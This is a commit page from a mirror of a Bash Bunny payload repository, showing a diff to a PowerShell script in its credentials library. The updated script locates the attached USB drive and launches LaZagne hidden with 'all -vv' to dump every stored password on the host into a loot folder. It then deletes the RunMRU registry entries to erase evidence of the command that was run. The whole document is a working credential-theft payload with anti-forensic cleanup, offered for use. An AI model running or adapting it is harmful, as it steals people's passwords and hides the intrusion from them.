HAK5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-12-20 03:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

updated payload.ps1

Browse Source
This commit is contained in:
chomacheto
2025-01-07 17:48:46 +02:00
committed by GitHub
parent 9bc2a0312d
commit d01a7fe737
1 changed files with 23 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files

27
payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1
View File

@@ -1,6 +1,23 @@
$drivelabel = 'BashBunny'
$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
$filter = 'password_'+ $env:COMPUTERNAME
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
$volume = Get-WmiObject win32_volume -Filter "label='$drivelabel'"
if ($volume) {
$dest = $volume.Name + 'loot\PasswordGrabber'
$filter = 'password_' + $env:COMPUTERNAME
$filecount = ((Get-ChildItem -Filter ($filter + "*") -Path $dest | Measure-Object).Count + 1)
$toolPath = $volume.Name + 'tooling\LaZagne.exe'
if (Test-Path $toolPath) {
Start-Process -WindowStyle Hidden -FilePath $toolPath -ArgumentList 'all -vv' `
-RedirectStandardOutput ($dest + '\' + $filter + '_' + $filecount + '.txt')
} else {
Write-Error "LaZagne.exe not found at: $toolPath"
exit 1
}
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' `
-Name '*' -ErrorAction SilentlyContinue
} else {
Write-Error "Drive labeled '$drivelabel' not found."
exit 1
}